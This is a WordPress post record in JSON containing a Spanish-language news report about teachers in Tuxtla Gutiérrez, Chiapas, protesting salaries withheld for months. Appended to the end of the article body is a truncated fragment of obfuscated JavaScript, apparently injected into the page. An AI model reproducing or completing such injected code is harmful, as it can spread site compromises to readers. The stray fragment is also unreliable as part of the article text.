{"id":18903,"date":"2024-11-20T05:10:29","date_gmt":"2024-11-20T05:10:29","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=18903"},"modified":"2024-11-20T05:10:30","modified_gmt":"2024-11-20T05:10:30","slug":"maestros-exigen-pagos-a-las-autoridades-educativas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=18903","title":{"rendered":"Maestros exigen pagos a las autoridades educativas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"765\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/FB_IMG_1732079253121-1024x765.jpg\" alt=\"\" class=\"wp-image-18904\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/FB_IMG_1732079253121-1024x765.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/FB_IMG_1732079253121-300x224.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/FB_IMG_1732079253121-768x574.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/FB_IMG_1732079253121.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>19 de noviembre del 2024. Tuxtla Guti\u00e9rrez. &#8211; Maestros interinos y de base realizaron una protesta en el centro de Tuxtla Guti\u00e9rrez ante la falta de pagos, que no han sido saldados por varios meses.<\/p>\n\n\n\n<p>Los denunciantes se\u00f1alaron directamente a Juan Jes\u00fas Guill\u00e9n Miceli, trabajador de la Secretar\u00eda de Educaci\u00f3n como principal responsable de retener los pagos y quitar los espacios laborales.<\/p>\n\n\n\n<p>Idalia Morales quien desde el mes de mayo le ha sido retenido su salario, dijo que, son cerca de 40 mil pesos el total que se le adeuda, sin embargo se ha mantenido dando clases a lo largo de estos casi 6 meses de adeudo.<\/p>\n\n\n\n<p>Ante esta situaci\u00f3n acudi\u00f3 a presentar una denuncia al tribunal burocr\u00e1tico en donde la demanda sali\u00f3 a su favor para resolver el problema, sin embargo contin\u00faa a la espera que la parte acusada pueda saldar sus pagos.<\/p>\n\n\n\n<p>\u201cComo mi caso hay muchos m\u00e1s sin resolver que se van acumulando, es por eso que le pedimos a las autoridades la pronta liberaci\u00f3n de los salarios\u201d, asegur\u00f3.<\/p>\n\n\n\n<p>Precis\u00f3 que, son muchos los casos similares y en breve otros docentes podr\u00edan sumarse a esta demanda, y tomar medidas radicales como quedarse en plant\u00f3n.<\/p>\n\n\n\n<p>Por su parte, Jorge Mayorga, otro de los maestros afectados mencion\u00f3 que su caso lleva a\u00f1os sin atenderse, en el 2018 cubri\u00f3 un interinato durante meses, sin embargo solo recibi\u00f3 algunos pagos y el resto nunca lleg\u00f3.<\/p>\n\n\n\n<p>\u201cPasaron los a\u00f1os y no recib\u00eda respuesta, yo segu\u00eda metiendo mis papeles y lo \u00fanico que me dec\u00edan era que lo iban a verificar, hasta que este a\u00f1o me dijeron que no me iban a poder pagar con la excusa de que mi interinato fue en otro sexenio y no hab\u00eda presupuesto\u201d, lament\u00f3.<\/p>\n\n\n\n<p>Aunque son m\u00e1s de 40 mil pesos el adeudo de sus pagos no pierde la esperanza de que pronto se resuelva su situaci\u00f3n al igual que la de sus compa\u00f1eros.<\/p>\n\n\n\n<p>\u201cYa lo trabajamos, lo justo es que nos paguen, y eso es lo que estamos peleando, nos han maltratado nos han dicho que, no nos pagar\u00e1n pero seguiremos insistiendo\u201d, manifest\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 19 de noviembre del 2024. Tuxtla Guti\u00e9rrez. &#8211; Maestros interinos y de base realizaron una protesta en el centro de Tuxtla Guti\u00e9rrez ante la falta de pagos, que no han sido saldados por varios meses. Los denunciantes se\u00f1alaron directamente a Juan Jes\u00fas Guill\u00e9n Miceli, trabajador de la Secretar\u00eda de Educaci\u00f3n como principal responsable &hellip;<\/p>\n","protected":false},"author":2,"featured_media":18904,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-18903","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18903","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=18903"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18903\/revisions"}],"predecessor-version":[{"id":18905,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18903\/revisions\/18905"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/18904"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=18903"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=18903"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=18903"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}